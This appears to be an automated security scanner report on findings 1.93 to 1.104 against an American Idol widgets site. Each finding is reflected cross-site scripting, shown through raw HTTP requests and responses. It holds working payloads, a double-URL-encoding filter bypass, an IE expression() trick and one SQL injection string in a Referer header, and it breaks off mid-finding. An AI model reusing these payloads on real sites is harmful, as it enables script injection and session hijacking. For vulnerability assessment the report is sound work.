Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:39 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Networkd7706'><script>alert(1)</script>7290e7f0327&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.93. http://widgets.myidol.americanidol.com/js/recentActivity/view [view parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/js/recentActivity/view

Issue detail

The value of the view request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 164ca'><script>alert(1)</script>ec7852c134f was submitted in the view parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network164ca'><script>alert(1)</script>ec7852c134f&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:37 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network164ca'><script>alert(1)</script>ec7852c134f&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.94. http://widgets.myidol.americanidol.com/js/recentActivity/view [wurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/js/recentActivity/view

Issue detail

The value of the wurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 91654'><script>alert(1)</script>9ce9e213cbe was submitted in the wurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/91654'><script>alert(1)</script>9ce9e213cbe&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:43 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
ol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/91654'><script>alert(1)</script>9ce9e213cbe&ms=1317758766'>
...[SNIP]...

1.95. http://widgets.myidol.americanidol.com/redirect.one [redirect_to parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/redirect.one

Issue detail

The value of the redirect_to request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c05ca'><script>alert(1)</script>4c9652dc110 was submitted in the redirect_to parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /redirect.one?redirect_to=http://www.americanidol.com/c05ca'><script>alert(1)</script>4c9652dc110 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.1.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:07:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:07:48 GMT
Content-Length: 1363
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/redirect.one?redirect_to=http://www.americanidol.com/c05ca'><script>alert(1)</script>4c9652dc110'>
...[SNIP]...

1.96. http://widgets.myidol.americanidol.com/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1e02%2527%253balert%25281%2529%252f%252ffadcf0d5e4c was submitted in the REST URL parameter 1. This input was echoed as d1e02';alert(1)//fadcf0d5e4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /toolsd1e02%2527%253balert%25281%2529%252f%252ffadcf0d5e4c/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E HTTP/1.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4170
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:31 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsd1e02';alert(1)//fadcf0d5e4c/'"--></style><_script>html_removednetsparker(0x000051)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirec
...[SNIP]...
<_script>').style.display = 'block';
                                   }
           else {
               // Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_toolsd1e02';alert(1)//fadcf0d5e4c/'"-->
...[SNIP]...

1.97. http://widgets.myidol.americanidol.com/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f31bd%253balert%25281%2529%252f%252f4dfd4995b75 was submitted in the REST URL parameter 1. This input was echoed as f31bd;alert(1)//4dfd4995b75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /toolsf31bd%253balert%25281%2529%252f%252f4dfd4995b75/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E HTTP/1.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4152
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:31 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsf31bd;alert(1)//4dfd4995b75/'"--></style><_script>html_removednetsparker(0x000051)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect
...[SNIP]...

1.98. http://widgets.myidol.americanidol.com/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c337%2522%253balert%25281%2529%252f%252f0f1dd352c7c was submitted in the REST URL parameter 1. This input was echoed as 1c337";alert(1)//0f1dd352c7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /tools1c337%2522%253balert%25281%2529%252f%252f0f1dd352c7c/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E HTTP/1.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4170
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:30 GMT
Connection: close

       function oneWidgetWaitForCookie_tools1c337";alert(1)//0f1dd352c7c/'"--></style><_script>html_removednetsparker(0x000051)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirec
...[SNIP]...
<_script>').style.display = 'block';
                                   }
           else {
               // Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_tools1c337";alert(1)//0f1dd352c7c/'"-->
...[SNIP]...

1.99. http://widgets.myidol.americanidol.com/tools/Netsparkerdcf8046f3ca84302a46153adee19582b/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/tools/Netsparkerdcf8046f3ca84302a46153adee19582b/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bea22%2527%253balert%25281%2529%252f%252f4e19821fe3b was submitted in the REST URL parameter 1. This input was echoed as bea22';alert(1)//4e19821fe3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /toolsbea22%2527%253balert%25281%2529%252f%252f4e19821fe3b/Netsparkerdcf8046f3ca84302a46153adee19582b/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3994
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:09 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsbea22';alert(1)//4e19821fe3b_Netsparkerdcf8046f3ca84302a46153adee19582b_() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           doc
...[SNIP]...
some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_toolsbea22';alert(1)//4e19821fe3b_Netsparkerdcf8046f3ca84302a46153adee19582b_) {
                   setTimeout(oneWidgetWaitForCookie_toolsbea22';alert(1)//4e19821fe3b_Netsparkerdcf8046f3ca84302a46153adee19582b_, 400);
               }
           }
       }
       function oneWidgetRedirStart() {
           document.cookie = "owrstart=1; expires=0; path=/";
           return;
       }
       function oneWidgetRedirAl
...[SNIP]...

1.100. http://widgets.myidol.americanidol.com/tools/Netsparkerdcf8046f3ca84302a46153adee19582b/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/tools/Netsparkerdcf8046f3ca84302a46153adee19582b/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f2835%253balert%25281%2529%252f%252f2a7b9c1de45 was submitted in the REST URL parameter 1. This input was echoed as f2835;alert(1)//2a7b9c1de45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /toolsf2835%253balert%25281%2529%252f%252f2a7b9c1de45/Netsparkerdcf8046f3ca84302a46153adee19582b/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3976
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:10 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsf2835;alert(1)//2a7b9c1de45_Netsparkerdcf8046f3ca84302a46153adee19582b_() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           docu
...[SNIP]...

1.101. http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload efafb<x%20style%3dx%3aexpr/**/ession(alert(1))>adba755e1d6 was submitted in the REST URL parameter 1. This input was echoed as efafb<x style=x:expr/**/ession(alert(1))>adba755e1d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /toolsefafb<x%20style%3dx%3aexpr/**/ession(alert(1))>adba755e1d6/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/ HTTP/1.1
Referer: http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/%EF%BF%BDw%1A%EF%BF%BD
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4032
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:49 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsefafb<x style=x:expr/**/ession(alert(1))>adba755e1d6_jwk...u......^r...(...{_() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button

...[SNIP]...

1.102. http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/%EF%BF%BDw%1A%EF%BF%BD [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/%EF%BF%BDw%1A%EF%BF%BD

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 35ae1<x%20style%3dx%3aexpr/**/ession(alert(1))>6ba37e770d1 was submitted in the REST URL parameter 1. This input was echoed as 35ae1<x style=x:expr/**/ession(alert(1))>6ba37e770d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tools35ae1<x%20style%3dx%3aexpr/**/ession(alert(1))>6ba37e770d1/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/%EF%BF%BDw%1A%EF%BF%BD HTTP/1.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D'
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4140
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:49 GMT
Connection: close

       function oneWidgetWaitForCookie_tools35ae1<x style=x:expr/**/ession(alert(1))>6ba37e770d1_jwk...u......^r...(...{_...w....() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect butt
...[SNIP]...

1.103. http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/Netsparker8f4d94ef206e4e3b82c23a8a89d01567/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/Netsparker8f4d94ef206e4e3b82c23a8a89d01567/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd987<x%20style%3dx%3aexpr/**/ession(alert(1))>f3d34dfffb7 was submitted in the REST URL parameter 1. This input was echoed as fd987<x style=x:expr/**/ession(alert(1))>f3d34dfffb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /toolsfd987<x%20style%3dx%3aexpr/**/ession(alert(1))>f3d34dfffb7/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/Netsparker8f4d94ef206e4e3b82c23a8a89d01567/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4516
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:33:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:33:03 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsfd987<x style=x:expr/**/ession(alert(1))>f3d34dfffb7/jwk...u......^r...(...{_Netsparker8f4d94ef206e4e3b82c23a8a89d01567_() {
           ckCntr++;
           if (ckCntr > 12)
...[SNIP]...

1.104. http://widgets.myidol.americanidol.com/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E

Issue detail

